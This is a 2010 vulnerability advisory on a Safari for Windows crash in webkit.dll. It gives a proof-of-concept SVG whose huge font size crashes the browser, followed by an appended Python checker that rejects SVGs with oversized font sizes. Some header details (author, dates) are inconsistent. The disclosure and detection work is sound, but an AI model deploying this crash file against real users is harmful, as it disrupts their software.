Safari for Windows Invalid SVG text style Webkit.dll DoS
Source: mustlive[at]websecurity.com.ua  Author: MustLive  Published: 2010-08-31
###################################################
Safari for Windows Invalid SVG text style Webkit.dll DoS
Vendor URL: www.apple.com
Advisory: http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html
Vendor notified: Yes
Exploit available: Yes
###################################################

Safari for Windows is prone to a denial-of-service condition.
The issue affects webkit.dll and causes a crash when Safari
tries to render an SVG image whose text style sets a very
large font size.



############
Versions
############

Safari for Windows 5.0.1 (7533.17.8)
on Windows 7 Ultimate, fully patched.


Safari for Windows 5.0.1 (7533.17.8)
on Windows XP Home SP3, fully patched.


############
Timeline
############

Discovered: 19-08-2010
Vendor notified: 25-08-2010
Vendor response: 26-08-2010
Disclosure: 30-09-2010

####################
Proof Of Concept
####################

Save this code as image.svg and open it with Safari. Note that
I have added some "extra" pixels to the font size in the text style.

################ BOF image.svg ######################

<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1">
<defs>
<mask id="crash">
<polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935"
transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)"
style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" />
</mask>
</defs>

<g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;">
<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text>
<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text>
<text x="20" y="190" style="font-size: 60pt; fill:pink;">Crash</text>
</g>

</svg>

###############EOF####################

################# End ###############

Thanks to Climbo for his patience and support.

-- 
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....
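
A defensive check for the condition this advisory describes, added here as an example and not part of the original advisory: it parses an SVG and reports every element whose font-size exceeds a limit, so such files can be rejected before a browser renders them. The MAX_FONT_PX limit, the function names and the reduced sample are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Assumed policy limit (not from the advisory): largest font size, in CSS px, accepted.
MAX_FONT_PX = 2000.0

# CSS absolute length units converted to px (96 px per inch); "" is a unitless SVG value.
UNIT_TO_PX = {"": 1.0, "px": 1.0, "pt": 96 / 72, "pc": 16.0,
              "in": 96.0, "cm": 96 / 2.54, "mm": 96 / 25.4}

FONT_SIZE_DECL = re.compile(r"(?:^|;)\s*font-size\s*:\s*([^;]+)", re.I)
LENGTH = re.compile(r"^\s*([+-]?(?:\d+\.?\d*|\.\d+)(?:e[+-]?\d+)?)\s*([a-z]*)\s*$", re.I)


def font_size_px(value):
    """Return the size in px, or None for keywords and relative units (em, %, 'large')."""
    m = LENGTH.match(value)
    if not m or m.group(2).lower() not in UNIT_TO_PX:
        return None
    return float(m.group(1)) * UNIT_TO_PX[m.group(2).lower()]


def oversized_font_sizes(svg_text, limit_px=MAX_FONT_PX):
    """List (tag, raw_value) for every element whose font-size exceeds limit_px."""
    findings = []
    for el in ET.fromstring(svg_text).iter():
        raw = [el.get("font-size")]  # presentation attribute form
        raw += FONT_SIZE_DECL.findall(el.get("style", ""))  # inline style form
        for value in filter(None, raw):
            px = font_size_px(value)
            if px is not None and px > limit_px:
                findings.append((el.tag.split("}")[-1], value.strip()))
    return findings


# Constructed sample: reduced from the advisory's image.svg (mask and polygon omitted).
SAMPLE = """<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
<g style="font-family:Verdana; font-size: 10pt; fill:red;">
<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text>
<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text>
</g></svg>"""

if __name__ == "__main__":
    for tag, value in oversized_font_sizes(SAMPLE):
        print(f"reject: <{tag}> font-size {value}")
```

xml.etree does not protect against entity-expansion attacks, so files from untrusted sources should pass through a hardened XML parser before this check.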

 